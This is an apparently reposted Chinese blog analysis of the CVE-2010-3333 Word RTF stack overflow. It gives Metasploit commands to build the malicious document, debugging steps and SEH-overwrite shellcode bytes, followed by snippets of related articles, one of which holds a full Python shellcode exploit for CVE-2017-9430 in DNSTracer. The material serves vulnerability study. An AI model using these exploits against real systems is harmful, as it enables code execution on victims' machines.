CVE-2010-3333 Word RTF 栈溢出漏洞

最新推荐文章于 2023-04-04 14:27:56 发布
最新推荐文章于 2023-04-04 14:27:56 发布
阅读量300 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 操作系统 python
原文链接:https://my.oschina.net/u/3281747/blog/1805288
本文分析了MS10-087 RTF格式文件中的栈溢出漏洞,详细解释了如何利用该漏洞并构造POC。通过对Word2003的测试,展示了如何触发异常并利用SEH进行攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

  1. 实验环境        
    • OS:Windows XP sp3
    • 漏洞软件:Word 2003
    • 工具:x32dbg+IDA 6.8+01Editor+C32ASM
  2. 样本生成
    • msfconsole
    • search cve-2010-3333
    • use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
    • set target 6
    • exploit
  3. 分析过程 

        打开Word 2003并且附加到x32dbg中,并用Word 03打开目标文件(此处是Crack.rtf),发现日志中有异常记录,异常点位于30E9KB88处(位于MSO.dll中)

此处从0x11040004处复制到0x00123DC0处,次数为0x322B次(0xACC8/4),具体情况我们回溯到0x30F4CC96处上面查看到Crack处的函数调用了来自0x30F4CC93处的Call dword ptr [eax+1C] //call sub_30E9EB62()。在IDA Pro中查看30E9EB62(),发现就是简单的调用qmemcpy(dst,src,count)

再次断点到0x30F4CC93处来查看,发现dst是0x00123DC0,src是0x1104000C([0x014D10F0+0x10]),count是0xACC8([0x014D10F0+0x8]),而sub_30F4CC5D()中只有0x14字节的空间(sub_30E9EB62()不开辟新的栈空间),0xACC8早就溢出当前函数的栈空间了,所以此处未对qmemcpy()中的count进行检查而导致栈溢出。

跟踪内存发现,我们复制的内容是Crack.rtf中acc8后的文本(此处文本转成了十六进制,即“41”=》0x41),而前面的“acc8”也刚好对应之前的qmemcpy()的count。

    最后,构造POC,第一时间我想到SEH exploit,恰好通过Mona检测到MSO.dll的SafeSEH是关闭的并且找到0x30CA50A9处作为ROP链首,溢出的SEH处的内容在Crack.rtf中的0x176C0偏移处。

最终得出shellcode。

shellcode={
  \xeb,\x0a,\x90,\x90,\xa9,\x50,\xca,\x30,\x90,\x90,\x90,\x90,
  \x6A,\x00,\x68,\x46,\x75,\x63,\x6B,\x89,\xE0,\x6A,\x00,\x68,\x43,\x61,\x70,\x00,
  \x89,\xE3,\x6A,\x00,\x53,\x50,\x6A,\x00,\xBA,\x30,\x1C,\xC9,\x30,\x8B,\x12,\xFF,\xD2,\xC3,
}
//shellcode=jmp 0A+\x90*2+ROP address+\x90*4+payload

效果如图所示:

PS:RTF文件格式说明

 

 

 

 

 

 

转载于:https://my.oschina.net/u/3281747/blog/1805288

CVE-2017-11882 Office漏洞
4SecNet团队专栏
03-16 912
简介 CVE-2017-11882属于缓冲区溢出类型漏洞,造成漏洞的原因是,EQNEDT32.EXE(微软office自带公式编辑器)进程在读入包含MathType的ole数据时,在拷贝公式字体名称(Font Name数据)时没有对名称长度进行校验,导致缓冲区溢出。通过覆盖函数的返回地址,可执行任意代码。 深究其中的具体原因还要对ole文件的数据格式进行了解: ole文件的数据格式 ...
CVE-2017-11882漏洞分析与利用
qq_36949907的博客
07-10 1835
(一次大作业,比较啰嗦 见谅) 漏洞介绍 2017年11月14号,微软推送了常规的安全更新,其中就包括CVE-2017-11882的安全更新,当时还引起了不小的关注,之后Github上也公布了许多POC及对应的漏洞利用程序。 仅仅从CVE-2017-11882的漏洞利用效果来看,它可以通杀Office 2003到Office 2016的所有版本,并且整个攻击环境的构建非常简单,效果又非常的好。例如,有些攻击效果会出现弹框、CPU飙高、发生异常等等,而这个漏洞的利用效果,堪称“无色无味”,即整个过程几.
漏洞cve2010-3333
m0_64973256的博客
12-22 822
可以看到,ESI地址指向的值已经拷贝到了栈中EBP-10的位置向下。而返回地址在EBP+4的位置,我们已经可以确定淹没返回值的位置了。cve-2010-3333是一个Office 2003 的栈溢出漏洞,其原因是在文档中读取一个属性值的时候,没有对其长度验证,导致了一个溢出,看着很简单的一个漏洞,却又有点恶心人。这里7FFA4512已经被识别成70004512。后面的弹窗shellcode也是一样。标记3处:这里是00000000,用来让je跳转,不要进入循环call;
Microsoft RTF栈溢出漏洞(CVE-2010-3333)漏洞分析
鬼手的博客
08-04 2183
文章目录漏洞描述分析环境RTF文件格式基于栈回溯的漏洞分析方法漏洞利用Office 2003与Office 2007 Exploit通用性研究 漏洞描述 Microsoft Office XP SP3,Office2003SP3,Office2007 SP2,Office 2010等多个版本的Office软件中,Open XML文件格式转换器存在栈溢出漏洞,主要是在处理RTF中的pFragment...
CVE-2010-3333
weixin_30640769的博客
09-17 360
---恢复内容开始--- 漏洞描述   CVE-2010-3333漏洞是Microsoft Office RTF分析器堆栈溢出漏洞,对应的Microsoft安全公告是MS10-087。远程攻击者可以借助特制的RTF数据执行任意代码,该漏洞又名"RTF栈缓冲区溢出漏洞"。 漏洞分析   通过exp文件来定位漏洞位置在进一步分析漏洞原因。先直接运行漏洞文档用监控工具观察触发漏洞后的行为。 ...
CVE-2010-3333:Microsoft RTF 栈溢出漏洞调试分析
CuiXY's Blog
02-08 931
0x01 前言 cve-2010-3333 漏洞是一个栈溢出漏洞,该漏洞是由于 Microsoft文档在处理 RTF 数据的对数据解析处理错误,在进行内存操作时没有对操作的数据进行长度限制,导致存在内存漏洞 环境 windows XP sp3(关闭了 ASLR) 分析工具 windbg 样本 能触发漏洞产生异常的 POC 目的 通过栈回溯的方式找到漏洞溢出点,分析漏洞成因 0x02 通过 me...
动手实验 CVE-2010-3333 Microsoft RTF栈溢出漏洞
abelxu
02-13 4580
手把手分析CVE-2010-3333 RTF栈溢出漏洞,同时分析了msf如何生成通用性的exp
CVE-2010-3333 Microsoft RTF栈溢出漏洞分析
weixin_50287973的博客
08-25 1061
参考:《漏洞战争》 漏洞描述 Microsoft Office XP SP3,Office 2003 SP3,Office 2007 SP2,Office 2010等多个版本的Office软件中的Open XML文件格式转换器存在栈溢出漏洞,主要是在处理RTF中的“pFragments”属性时存在栈溢出,导致远程攻击者可以借助特制的RTF数据执行任意代码,因此该漏洞又名“RTF栈缓冲区溢出漏洞”。 分析环境 所用环境 操作系统 windows xp sp3 调试器 windbg 漏
CVE-2012-0158:Microsoft Office MSCOMCTL.ocx 栈溢出漏洞调试分析
墨鱼菜鸡
02-18 227
0x01 Lotus Blossom 行动 在 2015 年 6 月,国外安全厂商 Palo Alto Networks 的威胁情...
CVE-2010-3333 分析学习
bluebloodye的专栏
03-10 987
0x01漏洞描述 0x02分析环境 环境 备注 操作系统 winxpsp3 网上下的镜像 虚拟机 VMware 版本号 15.0.2 调试器 o...
​​​​​​​CVE-2010-3333分析
wangtiankuo的博客
11-23 602
1.漏洞背景     RTF中“pFragments”属性存在栈溢出,远程攻击者可以借助特制的RTF数据执行任意代码。     RTF分析器在解析pFragments属性值时,没有正确计算属性值所占用的空间大小,导致栈溢出漏洞的发生,      后面有个图里圈出了要复制的数据大小以及数据。 2.漏洞成因     使用msf生成漏洞文档后,用windbg打开,在30e9eb88处发生...
office-栈溢出漏洞简单汇总
playmaker的博客
02-07 1053
CVE-2017-1182 关键词: rtf,公式编辑器,拷贝未检测长度,ACTIVEX控件解析 漏洞原理: 在读入公式的Font Name数据时,在将Name拷贝到一个函数内局部变量的时候没有对Name的长度做校验,从而造成栈缓冲区溢出 漏洞函数: 漏洞存在于EQNEDT21.EXE公式编辑器的sub_41160F函数中,我们将其拖进IDA,找到漏洞点,可以看到伪代码如下,这里没有对长度进行检验...
Microsoft Word RTF Font Table Heap Corruption - 漏洞解析(CVE-2023-21716)
0pr
03-09 1713
本文对 Office Word RTF Heap Corruption(CVE-2023-21716)进行了一些分析。目前为止,我们找到了 wwlib 库中的问题方法,初步了解了 RTF 格式以及控制字符。接着我们对 wwlib 中的 **FSearchFtcmap** 方法进行了行为分析,知道了 font id 是存放在 esi 中,切 esi 作为循环加载字体的 index,index 值将会使用 **movsx** 指令分别加载到 ecx 和 edx 中。
cve-2010-3333 分析简笔
weixin_38166557的博客
05-18 290
昨天分析了半拉,感觉整个过程很条理;但是今天再接着昨天的思路往下调试的时候,不知该在哪下断点了,翻阅了昨天的随手的记录才有了些印象,但是思路还是一团。看来写篇随笔还是很有必要的。故作此文。 简介Microsoft Office 是微软发布的非常流行的办公软件套件。 基于Mac平台的Microsoft Office XP SP3,Office 200...
适合新手入门的漏洞调试与分析—CVE-2010-3333
HBohan的博客
07-29 765
这是第二次在tools发帖,为了响应管理猿的号召,也为了爱好应用程序安全新手的需要。在此,我初步研究了一下微软3333漏洞的成因,并试着定位到了样本中的shellcode,现在就对这个入门级的漏洞做个简单的分析:   首先,我们还是用OD加载word.exe程序,按F9运行。如图:    图(一) 接下来,我们要具体分析3333漏洞出现的成因(具体的可以百度)。经过查询,我们知道导致3333漏洞的原因,是因为漏洞产生在MSO.DLL文件中,下文以Microsoft Office2003的MSO.DLL.
最新|RTF RCE 漏洞 CVE-2023-21716剖析
baidu_38876334的博客
04-04 1220
RTF文件中的漏洞是由于RTF文件处理器在解析文本内容时存在缺陷。攻击者可以利用特殊构造的RTF文件来欺骗受害者执行恶意代码。具体来说,攻击者可以在RTF文件中插入恶意代码,然后将RTF文件发送给受害者,一旦受害者打开该文件,恶意代码就会被执行。
漏洞复现】RTF URL Moniker 的逻辑漏洞 | OLE2Link 漏洞(CVE-2017-0199)
VI___
01-07 1698
一、CVE-2017-0199——类型:OLE对象中的逻辑漏洞 原理:漏洞利用 OFFICEOLE 对象链接技术,将恶意链接对象嵌入在文档中,之后调用 URLMoniker 将恶意链接中的 HTA 文件下载到本地,URLMoniker 通过识别响应头中 content-type 的字段,最终调用 mshta.exe 执行 HTA 文件中的攻击代码。攻击者通过该漏洞可以控制受影响的系统,对受...
漏洞战争》学习笔记·2 CVE-2010-3333
黑夜黎明
05-27 768
知识补充   RTF格式是为文本和图像信息格式的交换制定的一种文件格式,使用与不同设备,操作环境和系统。RTF文件基本元素:正文、控制字、控制符号、群组   控制字: RTF用来标记打印控制字符和管理文档信息的一种特殊格式的命令,RTF用它做正文格式的控制代码,每个控制字均以一个 反斜杠\开头 ,由a~z小写字母组成,通常不应该包含任何大写字母,而每个分隔符标志着控制字名称的结束。使用格式:\字母...
CVE-2017-9430(栈溢出漏洞)复现
最新发布
06-19
### CVE-2017-9430 栈溢出漏洞复现步骤 CVE-2017-9430 是 DNSTracer 1.9 中的一个栈溢出漏洞,该漏洞允许攻击者通过精心构造的输入数据覆盖返回地址并执行任意代码。以下是复现此漏洞的详细过程: #### 1. 环境搭建 为了成功复现 CVE-2017-9430 漏洞,需要准备以下环境: - 安装目标程序 DNSTracer 1.9。 - 使用支持调试和逆向工程的工具,例如 GDB 或 Radare2。 - 确保目标系统禁用了 ASLR(地址空间布局随机化)或绕过 ASLR。 在 Linux 系统中,可以通过以下命令禁用 ASLR: ```bash echo 0 > /proc/sys/kernel/randomize_va_space ``` #### 2. 分析漏洞成因 DNSTracer 1.9 在处理用户输入时未对缓冲区大小进行严格检查,导致可以利用超长字符串触发栈溢出。具体来说,`sscanf` 函数被用于解析输入数据,但没有验证输入长度,从而可能导致栈缓冲区被覆盖[^2]。 #### 3. 利用方法 一种常见的利用方法是通过覆盖返回地址为 `jmp esp` 指令的地址,从而使程序跳转到 shellcode 执行。以下是具体步骤: - **寻找 `jmp esp` 指令** 使用 `objdump` 工具查找目标程序中的 `jmp esp` 指令。例如: ```bash objdump -M intel -D /usr/local/bin/dnstracer | grep jmp | grep esp ``` 这将输出类似以下的结果: ``` 08048e5c: ff e4 jmp esp ``` - **构造 payload** 构造 payload 的关键在于确保覆盖返回地址为 `jmp esp` 指令的地址,并在其后附加 shellcode。例如: ```python #!/usr/bin/python import struct # Shellcode (example) shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80") # Padding to reach return address padding = "A" * 260 # Address of jmp esp (little-endian format) ret_address = struct.pack("<I", 0x08048e5c) # Construct the payload payload = padding + ret_address + shellcode # Write to file for testing with open("payload.txt", "w") as f: f.write(payload) ``` #### 4. 测试与验证 将生成的 payload 输入到 DNSTracer 中进行测试。如果配置正确,程序应跳转到 shellcode 并执行相应操作。 --- ### 注意事项 - 确保实验环境隔离,避免对生产系统造成影响。 - 如果启用了 ASLR,可能需要使用信息泄露技术或其他方法定位返回地址[^2]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值